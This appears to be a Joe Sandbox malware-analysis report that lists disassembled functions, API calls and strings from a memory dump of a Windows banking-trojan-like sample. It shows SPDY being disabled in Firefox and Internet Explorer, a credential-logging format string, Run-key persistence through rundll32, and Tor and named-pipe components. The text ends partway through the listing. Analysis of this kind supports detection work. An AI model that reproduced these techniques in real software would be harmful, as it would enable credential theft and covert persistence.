RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001D1A36
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001CF1E0,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 001D1A48
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,001CF1E0,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 001D1A55
wsprintfA.USER32 ref: 001D1A69
CreateFileA.KERNEL32(00000002,C0000000,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000094,00000000), ref: 001D1A7F
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001D1A98
WriteFile.KERNEL32(00000000,00000000), ref: 001D1AA0
GetLastError.KERNEL32 ref: 001D1AAE
CloseHandle.KERNEL32(00000000), ref: 001D1AB7
GetLastError.KERNEL32(?,00000000,?,001CF1E0,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 001D1AC8
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,001CF1E0,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 001D1AD8

Strings

\\.\%s, xrefs: 001D1A63

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s
API String ID: 3873609385-869905501
Opcode ID: a39d9581ad56cced61b793f09c1d262cbe85192f64c544665495fd70d09fbcb3
Instruction ID: e0cd5efae4bfa2665b28058bb630952d9d15be35de6d0a58d06cc525d2518e16
Opcode Fuzzy Hash: a39d9581ad56cced61b793f09c1d262cbe85192f64c544665495fd70d09fbcb3
Instruction Fuzzy Hash: 8311E6712826987FE3216BE4ACCCF7F3A5DEB42765F040025FA069A9D0DB600D85C2B1

Uniqueness

Uniqueness Score: 23.02%

Function 001D41B0, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

DeleteFileA.KERNEL32(00000000,000004D2), ref: 001D41D3
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001D41DC
GetLastError.KERNEL32 ref: 001D41E6
HeapFree.KERNEL32(00000000,00000000), ref: 001D426A

Strings

CertificateAuthority, xrefs: 001D4212
AuthRoot, xrefs: 001D4207
TrustedPublisher, xrefs: 001D423E
TrustedPeople, xrefs: 001D4233
Root, xrefs: 001D4228
Disallowed, xrefs: 001D421D
AddressBook, xrefs: 001D41FC

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: 752f8fe8169c86874a4a9a7f230b05a0d8b24399f177d55bfa49e18d63819a1f
Instruction ID: 822c568ef73c6c641c699e89984d531c92346e7211d29e12a0571527fe113dc6
Opcode Fuzzy Hash: 752f8fe8169c86874a4a9a7f230b05a0d8b24399f177d55bfa49e18d63819a1f
Instruction Fuzzy Hash: 99018231246A6073E52033F6AC0FF8F7E0E8F63B71F000512B704A56D15BA05541C2F6

Uniqueness

Uniqueness Score: 100.00%

Function 001D1269, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C7C2E: RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C7C36
Part of subcall function 001C7C2E: RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C7C4B
Part of subcall function 001C7C2E: InterlockedIncrement.KERNEL32(0000001C), ref: 001C7C64

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 001D129F
memset.NTDLL ref: 001D12B0
lstrcmpi.KERNEL32(?,?), ref: 001D12F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D1319
memcpy.NTDLL(00000000,?,?), ref: 001D132D
memset.NTDLL ref: 001D133A
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001D1353
memcpy.NTDLL(-00000005,HIDDEN,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001D136E
HeapFree.KERNEL32(00000000,?), ref: 001D138B

Strings

Blocked, xrefs: 001D1272, 001D139B
HIDDEN, xrefs: 001D1368

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 9979db7167ca3274f358daf604f4b97c943ec07eb50665fe0974906812172744
Instruction ID: 78f38fb1d3d41908b97d97e8c1885239a7340e65955543bb807f70d606cd3409
Opcode Fuzzy Hash: 9979db7167ca3274f358daf604f4b97c943ec07eb50665fe0974906812172744
Instruction Fuzzy Hash: B841AB72E00209BFDF209FA5CC85F9EBBBABB24324F24452AF514B6290D7759E44CB50

Uniqueness

Uniqueness Score: 100.00%

Function 001D3736, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116registrysynchronizationthreadUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C8069: lstrlenW.KERNEL32(?,00000000,00000000,?,00000250,?,00000000), ref: 001C80B5
Part of subcall function 001C8069: lstrlenW.KERNEL32(?,?,00000000), ref: 001C80C1
Part of subcall function 001C8069: memset.NTDLL ref: 001C8109
Part of subcall function 001C8069: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001C8124
Part of subcall function 001C8069: lstrlenW.KERNEL32(000000D3), ref: 001C815C
Part of subcall function 001C8069: lstrlenW.KERNEL32(?), ref: 001C8164
Part of subcall function 001C8069: memset.NTDLL ref: 001C8187
Part of subcall function 001C8069: wcscpy.NTDLL ref: 001C8199

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 001D37C9
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 001D37F8
RegSetValueExA.ADVAPI32(?,EnableSPDY3_0,00000000,00000004,00000000,00000004), ref: 001D3814
RegCloseKey.ADVAPI32(?), ref: 001D381D
WaitForSingleObject.KERNEL32(00000000,Function_00007E10,001E6228), ref: 001D3860
RtlExitUserThread.NTDLL(?), ref: 001D3896

Part of subcall function 001D50C0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,?,00000080,00000000,00000008,00000000,00000000,?,?,001C1CDE,00000000,?,?), ref: 001D50DE
Part of subcall function 001D50C0: GetFileSize.KERNEL32(00000000,00000000,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D50EE
Part of subcall function 001D50C0: CloseHandle.KERNEL32(000000FF,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D5150

Part of subcall function 001DB407: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 001DB448
Part of subcall function 001DB407: GetLastError.KERNEL32 ref: 001DB452
Part of subcall function 001DB407: WaitForSingleObject.KERNEL32(000000C8), ref: 001DB477
Part of subcall function 001DB407: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 001DB498
Part of subcall function 001DB407: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 001DB4C0
Part of subcall function 001DB407: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 001DB4D5
Part of subcall function 001DB407: SetEndOfFile.KERNEL32(?), ref: 001DB4E2
Part of subcall function 001DB407: CloseHandle.KERNEL32(?), ref: 001DB4FA

Strings

user_pref("network.http.spdy.enabled", false);, xrefs: 001D3781, 001D3797
EnableSPDY3_0, xrefs: 001D380C
prefs.js, xrefs: 001D374E
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001D3753
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 001D37EE

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 90276831-3405794569
Opcode ID: 233c51c2e78867dfae9daf87604dcf096e860c61ecb015ffb23bf6166683f8dc
Instruction ID: 00ba13bb98c79943cd27e83d5152c6adcdc072710e2ef2f5788a7155a7ce560f
Opcode Fuzzy Hash: 233c51c2e78867dfae9daf87604dcf096e860c61ecb015ffb23bf6166683f8dc
Instruction Fuzzy Hash: 7D419171E40654BFDB10DBA5DC86FAEBBBAEB14714F00402AF615B7290D7B09E40DB91

Uniqueness

Uniqueness Score: 100.00%

Function 001DDC80, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 001DDC90
CreateFileW.KERNEL32(001CF00E,80000000,?,001E6114,?,00000000,00000000,?,001CF00E,?,00000000,?,00000000), ref: 001DDCAD
GetLastError.KERNEL32(?,001CF00E,?,00000000,?,00000000), ref: 001DDD4E

Part of subcall function 001DB50A: lstrlen.KERNEL32(?,00000000,001DDCCE,00000027,001E6114,?,00000000,?,?,001DDCCE,Local\,00000001,?,001CF00E,?,00000000), ref: 001DB540
Part of subcall function 001DB50A: lstrcpy.KERNEL32(00000000,00000000), ref: 001DB564
Part of subcall function 001DB50A: lstrcat.KERNEL32(00000000,00000000), ref: 001DB56C

GetFileSize.KERNEL32(001CF00E,00000000,Local\,00000001,?,001CF00E,?,00000000,?,00000000), ref: 001DDCD9
CreateFileMappingA.KERNEL32(001CF00E,001E6114,00000002,00000000,00000000,001CF00E), ref: 001DDCED
lstrlen.KERNEL32(001CF00E,?,001CF00E,?,00000000,?,00000000), ref: 001DDD09
lstrcpy.KERNEL32(?,001CF00E), ref: 001DDD19
GetLastError.KERNEL32(?,001CF00E,?,00000000,?,00000000), ref: 001DDD21
HeapFree.KERNEL32(00000000,001CF00E,?,001CF00E,?,00000000,?,00000000), ref: 001DDD34
CloseHandle.KERNEL32(001CF00E,Local\,00000001,?,001CF00E), ref: 001DDD46

Strings

Local\, xrefs: 001DDCC1

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: ff9f11f376da51f8346cfb3e0abed8200336de01b24002a5cdb3d66daeb288b6
Instruction ID: 2955736b8e55af179769452a7ab7c0102573c8b95f6121083a06815e5da83c10
Opcode Fuzzy Hash: ff9f11f376da51f8346cfb3e0abed8200336de01b24002a5cdb3d66daeb288b6
Instruction Fuzzy Hash: 99212AB0900648FFDF149FE4EC88A9DBFB9EB04350F10846AF505EA6A0D7758E84DB50

Uniqueness

Uniqueness Score: 0.75%

Function 001CA7F4, Relevance: 18.2, APIs: 3, Strings: 9, Instructions: 217memorystringUNIQUE

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,001D07A5,?,00000000), ref: 001CA89E
HeapFree.KERNEL32(00000000,-00000008,?,?), ref: 001CA9CB
lstrlen.KERNEL32(-00000008,00000000), ref: 001CAA1D

Strings

Transfer-Encoding:, xrefs: 001CA9F6
Content-Length:, xrefs: 001CAA04
X-Frame-Options, xrefs: 001CA966
Content-Type:, xrefs: 001CA8D9
chunked, xrefs: 001CA9F1
Content-Security-Policy-Report-Only:, xrefs: 001CA95A
Content-Security-Policy:, xrefs: 001CA94E
Access-Control-Allow-Origin:, xrefs: 001CA970, 001CA975, 001CA987
HTTP/1.1 404 Not Found, xrefs: 001CA896

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$HTTP/1.1 404 Not Found$Transfer-Encoding:$X-Frame-Options
API String ID: 462153822-220856588
Opcode ID: c41d86ea86155daa22fb81828bbdf809b60735915fe8992fda3284056d423387
Instruction ID: e02322bfd9b503afbfb17baeb1f31f38413524cc2a8e3181e78f3fc588073530
Opcode Fuzzy Hash: c41d86ea86155daa22fb81828bbdf809b60735915fe8992fda3284056d423387
Instruction Fuzzy Hash: F6819B70600205EFDB05DF69C8C6FAA7BA8BF24318B618199FC059B296D770EC41CF91

Uniqueness

Uniqueness Score: 100.00%

Function 001C36D2, Relevance: 18.2, APIs: 12, Instructions: 179synchronizationstringthreadUNIQUE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C36F9
memcpy.NTDLL(?,?,00000010), ref: 001C371C
memset.NTDLL ref: 001C3768
lstrcpyn.KERNEL32(?,?,00000034), ref: 001C377C
GetLastError.KERNEL32 ref: 001C37A7
GetLastError.KERNEL32 ref: 001C37EA
GetLastError.KERNEL32 ref: 001C3809
WaitForSingleObject.KERNEL32(?,000927C0), ref: 001C3843
WaitForSingleObject.KERNEL32(?,00000000), ref: 001C3851
GetLastError.KERNEL32 ref: 001C38C6
ReleaseMutex.KERNEL32(?), ref: 001C38D8
RtlExitUserThread.NTDLL(?), ref: 001C38EE

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 21bcbe0dd045a114bd632fa263f92e68c1928fd72ed19a4e34599c51cb85ddd3
Instruction ID: 70417120fe3d3ecbe6d3f62c6e9f7b6a69f7759e0261e9a26d0dcdeb82c10c44
Opcode Fuzzy Hash: 21bcbe0dd045a114bd632fa263f92e68c1928fd72ed19a4e34599c51cb85ddd3
Instruction Fuzzy Hash: 8F618AB0504740AFC7209F659C49F1FBBE9BFA4720F008A2DF5A696590E770EA44CF62

Uniqueness

Uniqueness Score: 100.00%

Function 001C2587, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadUNIQUE

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001C25B9
WaitForSingleObject.KERNEL32(00000314,00000000), ref: 001C25DB
ConnectNamedPipe.KERNEL32(?,?), ref: 001C25FB
GetLastError.KERNEL32 ref: 001C2605
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C2629
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 001C266C
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001C2675
WaitForSingleObject.KERNEL32(00000000), ref: 001C267E
CloseHandle.KERNEL32(?), ref: 001C2693
GetLastError.KERNEL32 ref: 001C26A0
CloseHandle.KERNEL32(?), ref: 001C26AD
RtlExitUserThread.NTDLL(000000FF), ref: 001C26C3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: fb4b914d07331fa9cbd880784640f41373631b4949db3b5af9e0e1996e9b31a7
Instruction ID: b0e050c5a1a729e08cd6b58dc8d9978b68b0c27b98d8e387bbd4d5dd9ac7def2
Opcode Fuzzy Hash: fb4b914d07331fa9cbd880784640f41373631b4949db3b5af9e0e1996e9b31a7
Instruction Fuzzy Hash: E031BD70004355AFD7109F64CC88AAEBBADFB54320F004A2CF965D64A0D770DE85CFA2

Uniqueness

Uniqueness Score: 100.00%

Function 001D7083, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 165memorythreadsleepUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 001D70BC
memset.NTDLL ref: 001D70D0

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

GetCurrentThreadId.KERNEL32 ref: 001D7160
GetCurrentThread.KERNEL32 ref: 001D7173
RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001D721A
Sleep.KERNEL32(0000000A), ref: 001D7224
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001D724A
HeapFree.KERNEL32(00000000,?), ref: 001D7278
HeapFree.KERNEL32(00000000,00000018), ref: 001D728B

Strings

TorClient, xrefs: 001D70E2

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: 50fafad4f269ba2dffa3ef8d3a97b651a4edfe2c1a0038615be7d4394d72f8bb
Instruction ID: 5f49001720a4c74946f40e6b24adc972b29c4ce1de8cd0dcb5dcea5f2eb4770e
Opcode Fuzzy Hash: 50fafad4f269ba2dffa3ef8d3a97b651a4edfe2c1a0038615be7d4394d72f8bb
Instruction Fuzzy Hash: 695118B1508381AFD710DFA4DCC191EBBE8FBA8344F40492EF595D66A1E731DD488BA2

Uniqueness

Uniqueness Score: 100.00%

Function 001C9EF9, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 118registrymemoryUNIQUE

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 001C9F22
RtlEnterCriticalSection.NTDLL(00000000), ref: 001C9F63
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 001C9F77
CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 001C9FCC
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 001CA016
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 001CA024
RtlLeaveCriticalSection.NTDLL(00000000), ref: 001CA02F

Part of subcall function 001C3ECE: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 001C3EE2
Part of subcall function 001C3ECE: memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,001C332E,00000000,00000000,00000001,?,001C3A10,00000020,00000000,?,00000000), ref: 001C3F0B
Part of subcall function 001C3ECE: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000), ref: 001C3F33
Part of subcall function 001C3ECE: RegCloseKey.ADVAPI32(00000000,?,001C332E,00000000,00000000,00000001,?,001C3A10,00000020,00000000,?,00000000,?,00000000,00000000), ref: 001C3F5E

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 001C9F6D
rundll32, xrefs: 001C9FD5, 001C9FDA
Client32, xrefs: 001C9F33

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 3181710096-668865654
Opcode ID: 29f945f204a3f980fc835047e9f3c8d420cae635428468de469b5778fd420274
Instruction ID: 41448286529e46230370b71cc88cc14ac995ebc075729d0294bb21f4fb10c7fb
Opcode Fuzzy Hash: 29f945f204a3f980fc835047e9f3c8d420cae635428468de469b5778fd420274
Instruction Fuzzy Hash: AF31D432200254ABDB325FA1DC89F6E7EA9EF64B94F24001DF905DA5A1DB70CD90CBA1

Uniqueness

Uniqueness Score: 100.00%

Function 001DA820, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 106memorystringUNIQUE

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000002C,7767D3B0,00000000,779F5520,?,?,?,001D009D,00000000,Scr,?,?,?,00000000), ref: 001DA845
StrChrA.SHLWAPI(00000001,0000002C,?,?,?,001D009D,00000000,Scr,?,?,?,00000000), ref: 001DA858
StrTrimA.SHLWAPI(00000000,001E2404,?,?,?,001D009D,00000000,Scr,?,?,?,00000000), ref: 001DA877
StrTrimA.SHLWAPI(00000001,001E2404,?,?,?,001D009D,00000000,Scr,?,?,?,00000000), ref: 001DA87B
lstrlen.KERNEL32(00000000,?,?,?,001D009D,00000000,Scr,?,?,?,00000000), ref: 001DA8B2
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001DA8C5
lstrcpy.KERNEL32(00000004,00000000), ref: 001DA8E3
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,001D009D,00000000,Scr,?,?,?,00000000), ref: 001DA909

Strings

W, xrefs: 001DA82D
Scr, xrefs: 001DA8ED, 001DA93F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1974185407-3281027876
Opcode ID: b9329a41c196be4eb09f2e0692ae5e6a687148e82783e6ad998f01b72bf0d4f1
Instruction ID: ce0861ce5e81d7edbd12cc7d6abeeb3e12962ad787793fe8b64d47c1aec7e497
Opcode Fuzzy Hash: b9329a41c196be4eb09f2e0692ae5e6a687148e82783e6ad998f01b72bf0d4f1
Instruction Fuzzy Hash: DF31C030900258FEDB259FA5CC84E9FBFB9EF447A4F11401AF904AB260D7B09D81DB55

Uniqueness

Uniqueness Score: 100.00%

Function 001C334E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001CB3FB: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CB42D
Part of subcall function 001CB3FB: HeapFree.KERNEL32(00000000,00000000,?,?,001C336A,?,00000022,00000000,00000000,00000000,?,?), ref: 001CB452

Part of subcall function 001C1BB1: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1BEB
Part of subcall function 001C1BB1: HeapFree.KERNEL32(00000000,?,?,00000001), ref: 001C1C37

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,00000022,00000000,00000000,00000000,?,?), ref: 001C33C0
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,00000022,00000000,00000000,00000000,?,?), ref: 001C33C8
lstrlen.KERNEL32(?), ref: 001C33D2
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C33E7
wsprintfA.USER32 ref: 001C341C
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 001C343E
HeapFree.KERNEL32(00000000,?), ref: 001C3453
HeapFree.KERNEL32(00000000,?), ref: 001C3460
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,00000022,00000000,00000000,00000000,?,?), ref: 001C346E

Strings

URL: %suser=%spass=%s, xrefs: 001C3416

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: 69dafc00ce52a436542d1f0deb8c06aec9aff2c60aea5d8dba4dc457eeccaa37
Instruction ID: 21343c220e1bad100d248e936ad56c2b9687556c564679e068545646360f154e
Opcode Fuzzy Hash: 69dafc00ce52a436542d1f0deb8c06aec9aff2c60aea5d8dba4dc457eeccaa37
Instruction Fuzzy Hash: 6031EE30604340BFCB22AFA59C81F5FBBA9FF54714F00492EF994A61A2D770C954CBA2

Uniqueness

Uniqueness Score: 100.00%

Function 001C4BF6, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeUNIQUE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4C02
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001C4C18
_snwprintf.NTDLL ref: 001C4C3D
CreateFileMappingW.KERNEL32(000000FF,001E6114,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 001C4C59
GetLastError.KERNEL32 ref: 001C4C6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 001C4C82
CloseHandle.KERNEL32(00000000), ref: 001C4CA3
GetLastError.KERNEL32 ref: 001C4CAB

Strings

Local\, xrefs: 001C4C2C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: a833300cf3827ddee00543bcf1b6b28413a0fbe82367fb25178e5b0d0446cb90
Instruction ID: 32a3fdadc70436a2c66488581db39cb762da0425098ad3f1ccae5b2c58aa18e1
Opcode Fuzzy Hash: a833300cf3827ddee00543bcf1b6b28413a0fbe82367fb25178e5b0d0446cb90
Instruction Fuzzy Hash: 8D212472601248BBD721DFA4CC56F8E77B9AB94710F250025FA05EB2E0EB70DA45CB64

Uniqueness

Uniqueness Score: 100.00%

Function 001C48A2, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,779F5520), ref: 001C48D8
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 001C48ED
RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C4915
HeapFree.KERNEL32(00000000,?), ref: 001C4956
HeapFree.KERNEL32(00000000,00000000), ref: 001C4966
RtlAllocateHeap.NTDLL(00000000,001D5435), ref: 001C4979
RtlAllocateHeap.NTDLL(00000000,001D5435), ref: 001C4988
HeapFree.KERNEL32(00000000,00000000,?,001D5435,00000000,?,?,?), ref: 001C49D2
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001D5435,00000000,?,?,?), ref: 001C49F6
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,001D5435,00000000,?,?), ref: 001C4A1B
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,001D5435,00000000,?,?), ref: 001C4A30

Memory Dump Source

